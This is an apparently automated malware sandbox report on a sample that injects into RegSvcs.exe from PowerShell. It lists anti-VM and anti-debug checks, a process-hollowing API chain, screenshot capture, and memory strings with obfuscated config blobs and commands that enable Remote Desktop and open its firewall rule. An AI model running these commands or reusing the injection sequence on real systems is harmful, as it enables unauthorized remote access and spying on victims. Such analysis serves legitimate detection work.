                Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001466000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: Amcache.hve.0.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.0.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.0.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.0.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.0.dr | Binary or memory string: vmci.sys
                Source: Amcache.hve.0.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin`
                Source: RegSvcs.exe, 00000003.00000002.4127608803.0000000001466000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWCO=
                Source: Amcache.hve.0.dr | Binary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.0.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1
                Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.0.dr | Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.0.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.0.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.0.dr | Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.0.dr | Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.0.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.0.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042A4A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004362F2 mov eax, dword ptr fs:[00000030h]3_2_004362F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042DE60 mov eax, dword ptr fs:[00000030h]3_2_0042DE60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004407F2 GetProcessHeap,3_2_004407F2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042A4A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A608 SetUnhandledExceptionFilter,3_2_0042A608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00429BB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00429BB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042EE6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042EE6D

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00408070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,3_2_00408070
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 451000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 466000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46D000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 46E000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F4C008
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0042A68F cpuid 3_2_0042A68F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00442126
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoW,3_2_00442321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: EnumSystemLocalesW,3_2_004423C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: EnumSystemLocalesW,3_2_00442413
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: EnumSystemLocalesW,3_2_004424AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: EnumSystemLocalesW,3_2_004384BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00442539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoW,3_2_0044278C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004428B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoW,3_2_004389DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoW,3_2_004429B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00442A87
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004296A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,3_2_004296A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,3_2_004061F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0043E98E _free,_free,_free,GetTimeZoneInformation,_free,3_2_0043E98E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004091B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,3_2_004091B0
                Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.powershell.exe.296dbc78c18.5.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.powershell.exe.296dbc78c18.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: powershell.exe, 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: net start termservice
                Source: powershell.exe, 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta60c430246a6b5eabfeff991901daa754340bbf41c5952b1373dfe1ff8834fec26467e7e9fc62574ce418d4877910b7601ae5eMO24EbtoFt4sNNYuNYQCLu7I7fJS4hgVSANTM7pz4ETUJcrrcA==NNTzFs==UtPn5zJkJNQu7I==LNKu7I==YRGoFvFVGRNcOa==RY727PKkEhVZ0K==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxT21dZL==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeOPCc6dBObAZscHFLg0vaXMzCUYGj6fGS6v==UhKvYXQmBuYuBAJISypSJHcEQ1C7UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxciKwSymjFuIbUCyxSVy95SM=UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeNU7c5BwbSgcs0LZDhu==JQKVKNyHNf9BTOBFKV==Xzuy6s==UzYVOs==RVKWaRF8diB8cXF8bYB8Yh 8YSx8cBB8dRT8ZBP8YSN8bCN8bX28ceP=YYynSuUb5Bx3ZWBpdH9pgEvYYYynSuUb5Bw=YXmr6uUb5Bw=Zyt=ZOt=ZOx=ZOB=TRur59==aCG26vdmEr==aCG26zBXEt8=ZS7nZBmuYXQmcCBzbSCrehayLYu34OKRPBB+PBF+LWqu7O3g5iMqKthtIr==fv==JiKw4PF0PL==cX7n5ylqFd5fcAA=aXKA5eKjFuIp0ABsRXK2MeuR4SZgVXpzeLZyXU3c 
l==UCyxSVy95PRceAJcQQODNTF8NX9heBhhdrY=QSOr6et=SXuB6yKp6Xt0JyBhZl==RQCHOs==UBuwSyt8NXVeeRNpeMo=RBYl7yYpBAdgZa==QQOJMuNyOyYRRRxO0QR1drp5jO==Qha2SyKdSR5f0RM=ThYA7yYlUXYy4yYqQXYv5UGmVXawKyKdSR5f0RM=MytAFrFSGecZPK==chx=dXx=QXYw7yKl7x1PfRFlPnFyiUvQ9MrkcnMpZhYA5KQbRSRcPsFic8Zz4EDocIQwLSWnLNPvEKPkDLeF5UURSR5VMOVpd8FAh0jQ9LZxOixgbYyvEOG97BE2JA9hc1YdNkP8bvulOyxgaRmn5eukSO0dIbPMJUYl7BVpew5Uf2FqTgz8awrvaWJbdBax5aYmRYRgew5zeMNq3UYDA6QNDLdvEKPkEN0=LNPPv9==PYCl6bPoLheySo==QXYw7yKl7x1PfRFlPnFmhFzi9LDkdGhpbdY6EP3U7t1hcXNtM2ZDgETkWRZnZWM=UWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8RWctdMZ54VHEWLRoXEJpbSq37yKpMhFo0K==QXYv6zKRSSJJZQ5lYRylSyKdSXhkbgxsc19AhFDoaSH4dn YeSdyFLxqGyUXOtk5M0b=LSKw4OCmSBUoUWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8WQ9peLZp0kjaXLZfQ05IVAyRMxmNLPRAUVA=UWaVOwKEQzNqchVyc7BY4VOmKsvfU2RsdhalSPC4JhFubQREb2RBgEDVVuPsZGRpVhamSOYAKv==XypyFvp=RBKoRPKj7ANgeBVpcrhEQjfIXMDybHRUaRYwRBKoRPKj7ANgeBVpcrhEQjjIXMDybHRUaRYwUVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYBiMdG4JYVtdgZueK3qhlLf RU=UCyxSzKa7z5ccQY=MepzHI==MepAF9==MepzG9==MepAGI==QYKA6eKl7zJWbQBkXv==Oed8ciKwSymjFuIp0RllLXhiIiGj6Uii4RxnJwcmJHcugQy9IdpoCaqR4R1gcXZ0JIIlOgW7XvLvIA==JdNiKP7g7xI=IdpoCaqpSR4bIxNoBs==UBY5SPyq4BVncw9lfLY=LRK6SOCS7BlqchFvcLpojQzoXLRydGRtaR3wSOF8EPZkcAYgJl==Ib==cX737yGm7X4bMRQgM2UlRy==cYFa6o==chuwSyYkSXK7ReY96hQbUAJ5c8Z52DzoXLnyYWM=MypyFvpRFOk=MypyFvpRFeI=MypyFvpRFeM=MypyFvpRFXY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CBEC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: net start termservice
                Source: powershell.exe, 00000000.00000002.1840009085.00000296CBEC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta60c430246a6b5eabfeff991901daa754340bbf41c5952b1373dfe1ff8834fec26467e7e9fc62574ce418d4877910b7601ae5eMO24EbtoFt4sNNYuNYQCLu7I7fJS4hgVSANTM7pz4ETUJcrrcA==NNTzFs==UtPn5zJkJNQu7I==LNKu7I==YRGoFvFVGRNcOa==RY727PKkEhVZ0K==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxT21dZL==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeOPCc6dBObAZscHFLg0vaXMzCUYGj6fGS6v==UhKvYXQmBuYuBAJISypSJHcEQ1C7UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxciKwSymjFuIbUCyxSVy95SM=UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeNU7c5BwbSgcs0LZDhu==JQKVKNyHNf9BTOBFKV==Xzuy6s==UzYVOs==RVKWaRF8diB8cXF8bYB8Yh 8YSx8cBB8dRT8ZBP8YSN8bCN8bX28ceP=YYynSuUb5Bx3ZWBpdH9pgEvYYYynSuUb5Bw=YXmr6uUb5Bw=Zyt=ZOt=ZOx=ZOB=TRur59==aCG26vdmEr==aCG26zBXEt8=ZS7nZBmuYXQmcCBzbSCrehayLYu34OKRPBB+PBF+LWqu7O3g5iMqKthtIr==fv==JiKw4PF0PL==cX7n5ylqFd5fcAA=aXKA5eKjFuIp0ABsRXK2MeuR4SZgVXpzeLZyXU3c 
l==UCyxSVy95PRceAJcQQODNTF8NX9heBhhdrY=QSOr6et=SXuB6yKp6Xt0JyBhZl==RQCHOs==UBuwSyt8NXVeeRNpeMo=RBYl7yYpBAdgZa==QQOJMuNyOyYRRRxO0QR1drp5jO==Qha2SyKdSR5f0RM=ThYA7yYlUXYy4yYqQXYv5UGmVXawKyKdSR5f0RM=MytAFrFSGecZPK==chx=dXx=QXYw7yKl7x1PfRFlPnFyiUvQ9MrkcnMpZhYA5KQbRSRcPsFic8Zz4EDocIQwLSWnLNPvEKPkDLeF5UURSR5VMOVpd8FAh0jQ9LZxOixgbYyvEOG97BE2JA9hc1YdNkP8bvulOyxgaRmn5eukSO0dIbPMJUYl7BVpew5Uf2FqTgz8awrvaWJbdBax5aYmRYRgew5zeMNq3UYDA6QNDLdvEKPkEN0=LNPPv9==PYCl6bPoLheySo==QXYw7yKl7x1PfRFlPnFmhFzi9LDkdGhpbdY6EP3U7t1hcXNtM2ZDgETkWRZnZWM=UWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8RWctdMZ54VHEWLRoXEJpbSq37yKpMhFo0K==QXYv6zKRSSJJZQ5lYRylSyKdSXhkbgxsc19AhFDoaSH4dn YeSdyFLxqGyUXOtk5M0b=LSKw4OCmSBUoUWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8WQ9peLZp0kjaXLZfQ05IVAyRMxmNLPRAUVA=UWaVOwKEQzNqchVyc7BY4VOmKsvfU2RsdhalSPC4JhFubQREb2RBgEDVVuPsZGRpVhamSOYAKv==XypyFvp=RBKoRPKj7ANgeBVpcrhEQjfIXMDybHRUaRYwRBKoRPKj7ANgeBVpcrhEQjjIXMDybHRUaRYwUVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYBiMdG4JYVtdgZueK3qhlLf RU=UCyxSzKa7z5ccQY=MepzHI==MepAF9==MepzG9==MepAGI==QYKA6eKl7zJWbQBkXv==Oed8ciKwSymjFuIp0RllLXhiIiGj6Uii4RxnJwcmJHcugQy9IdpoCaqR4R1gcXZ0JIIlOgW7XvLvIA==JdNiKP7g7xI=IdpoCaqpSR4bIxNoBs==UBY5SPyq4BVncw9lfLY=LRK6SOCS7BlqchFvcLpojQzoXLRydGRtaR3wSOF8EPZkcAYgJl==Ib==cX737yGm7X4bMRQgM2UlRy==cYFa6o==chuwSyYkSXK7ReY96hQbUAJ5c8Z52DzoXLnyYWM=MypyFvpRFOk=MypyFvpRFeI=MypyFvpRFeM=MypyFvpRFXY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                Source: RegSvcs.exe | String found in binary or memory: net start termservice
                Source: RegSvcs.exe, 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: net start termservice
                Source: RegSvcs.exe, 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta60c430246a6b5eabfeff991901daa754340bbf41c5952b1373dfe1ff8834fec26467e7e9fc62574ce418d4877910b7601ae5eMO24EbtoFt4sNNYuNYQCLu7I7fJS4hgVSANTM7pz4ETUJcrrcA==NNTzFs==UtPn5zJkJNQu7I==LNKu7I==YRGoFvFVGRNcOa==RY727PKkEhVZ0K==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxT21dZL==UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeOPCc6dBObAZscHFLg0vaXMzCUYGj6fGS6v==UhKvYXQmBuYuBAJISypSJHcEQ1C7UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033ScLxciKwSymjFuIbUCyxSVy95SM=UVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYCeJVKp6hVpez3ldsRug033PM8zbG5sZSyeNU7c5BwbSgcs0LZDhu==JQKVKNyHNf9BTOBFKV==Xzuy6s==UzYVOs==RVKWaRF8diB8cXF8bYB8Yh 8YSx8cBB8dRT8ZBP8YSN8bCN8bX28ceP=YYynSuUb5Bx3ZWBpdH9pgEvYYYynSuUb5Bw=YXmr6uUb5Bw=Zyt=ZOt=ZOx=ZOB=TRur59==aCG26vdmEr==aCG26zBXEt8=ZS7nZBmuYXQmcCBzbSCrehayLYu34OKRPBB+PBF+LWqu7O3g5iMqKthtIr==fv==JiKw4PF0PL==cX7n5ylqFd5fcAA=aXKA5eKjFuIp0ABsRXK2MeuR4SZgVXpzeLZyXU3c 
l==UCyxSVy95PRceAJcQQODNTF8NX9heBhhdrY=QSOr6et=SXuB6yKp6Xt0JyBhZl==RQCHOs==UBuwSyt8NXVeeRNpeMo=RBYl7yYpBAdgZa==QQOJMuNyOyYRRRxO0QR1drp5jO==Qha2SyKdSR5f0RM=ThYA7yYlUXYy4yYqQXYv5UGmVXawKyKdSR5f0RM=MytAFrFSGecZPK==chx=dXx=QXYw7yKl7x1PfRFlPnFyiUvQ9MrkcnMpZhYA5KQbRSRcPsFic8Zz4EDocIQwLSWnLNPvEKPkDLeF5UURSR5VMOVpd8FAh0jQ9LZxOixgbYyvEOG97BE2JA9hc1YdNkP8bvulOyxgaRmn5eukSO0dIbPMJUYl7BVpew5Uf2FqTgz8awrvaWJbdBax5aYmRYRgew5zeMNq3UYDA6QNDLdvEKPkEN0=LNPPv9==PYCl6bPoLheySo==QXYw7yKl7x1PfRFlPnFmhFzi9LDkdGhpbdY6EP3U7t1hcXNtM2ZDgETkWRZnZWM=UWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8RWctdMZ54VHEWLRoXEJpbSq37yKpMhFo0K==QXYv6zKRSSJJZQ5lYRylSyKdSXhkbgxsc19AhFDoaSH4dn YeSdyFLxqGyUXOtk5M0b=LSKw4OCmSBUoUWaVOwKEQzNWdhNlcsVIg03QabZvU2RUXzCx5fGp5Xx8WQ9peLZp0kjaXLZfQ05IVAyRMxmNLPRAUVA=UWaVOwKEQzNqchVyc7BY4VOmKsvfU2RsdhalSPC4JhFubQREb2RBgEDVVuPsZGRpVhamSOYAKv==XypyFvp=RBKoRPKj7ANgeBVpcrhEQjfIXMDybHRUaRYwRBKoRPKj7ANgeBVpcrhEQjjIXMDybHRUaRYwUVYIOx3sNfV8UQpjdrcEg0XQVu4sbmNpdYBiMdG4JYVtdgZueK3qhlLf 